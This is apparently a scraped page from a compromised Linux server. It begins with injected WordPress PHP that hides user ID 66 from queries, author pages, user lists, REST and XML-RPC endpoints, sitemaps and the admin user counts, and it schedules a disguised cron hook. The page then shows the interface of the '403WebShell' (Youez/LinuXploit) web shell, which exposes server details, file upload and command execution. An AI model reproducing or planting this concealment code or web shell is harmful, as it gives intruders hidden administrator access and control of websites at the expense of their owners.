add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/nftables.md5sums
fa7a981617fbd9ae858a7412618ec313  usr/lib/systemd/system/nftables.service
9f64670d9ffde1c81b00a6cb32217356  usr/sbin/nft
f455533398fa2e7689165d7a2c039b20  usr/share/doc/nftables/README.Debian
f9ef14fe463393c95dc0b88a8409b0e6  usr/share/doc/nftables/copyright
eb02ea3bf21dad6c51858cee593162a8  usr/share/doc/nftables/examples/README
593019c00dbe7ca7f9fe48ead21a5f35  usr/share/doc/nftables/examples/all-in-one.nft
fe8b40f29996f3cb89068ef82dd47ac8  usr/share/doc/nftables/examples/arp-filter.nft
94eaaf31e563af1d9d95b7f820d9947a  usr/share/doc/nftables/examples/bridge-filter.nft
0385b2a632f9dbe6243a0b6c8d4bb89c  usr/share/doc/nftables/examples/ct_helpers.nft
c162af1a8c54c9b4d606384c804e5878  usr/share/doc/nftables/examples/inet-filter.nft
cf026d1ee6dd1a49c809863421b63277  usr/share/doc/nftables/examples/inet-nat.nft
2b05561ce1d3952aace014e13c06f4a1  usr/share/doc/nftables/examples/ipv4-filter.nft
e2d8d82eb5464bef52da0af2bc43118a  usr/share/doc/nftables/examples/ipv4-mangle.nft
e6352275a23eb418b88bda809cc45ef4  usr/share/doc/nftables/examples/ipv4-nat.nft
aee8fd9a8f662240c2d15ad005786bec  usr/share/doc/nftables/examples/ipv4-raw.nft
69b07584fc170399e64ee2d9ca096991  usr/share/doc/nftables/examples/ipv6-filter.nft
aa88f425868f2e6f2993439ffe50d3bc  usr/share/doc/nftables/examples/ipv6-mangle.nft
f97c072fdc679570b4687c74f884bd03  usr/share/doc/nftables/examples/ipv6-nat.nft
0e9e18013d87de46329dc620f0af2e90  usr/share/doc/nftables/examples/ipv6-raw.nft
9f35890b5a686b1687e1368d07321693  usr/share/doc/nftables/examples/load_balancing.nft
cc43cdaa6e19b0f16796a677f116d4a0  usr/share/doc/nftables/examples/nat.nft
a8eabe1c21847df914799e154d84bb68  usr/share/doc/nftables/examples/netdev-ingress.nft
0f81475cf5f9fef4f30f45d8f27c095c  usr/share/doc/nftables/examples/overview.nft
c0c61c3c290f6f515068359ce10e6cf4  usr/share/doc/nftables/examples/pf.os
b92ce2af01fe3d651e0d424a5a816785  usr/share/doc/nftables/examples/secmark.nft
6fdb3bac8bcf6c0d1f0250285ae4b2b0  usr/share/doc/nftables/examples/sets_and_maps.nft
65076b4ddfc7a53f728e068a0809304d  usr/share/doc/nftables/examples/sysvinit/README
67d9527e1376331550173f562709d98c  usr/share/doc/nftables/examples/sysvinit/nftables.init
41a742b1e8c7bbd3ac76338cdb75f8de  usr/share/doc/nftables/examples/workstation.nft
b26e34a00c60b1006d111295c9319eb5  usr/share/lintian/overrides/nftables
52e29075cb4e159dd974c5ac38157482  usr/share/man/man8/nft.8.gz

Youez - 2016 - github.com/yon3zu
LinuXploit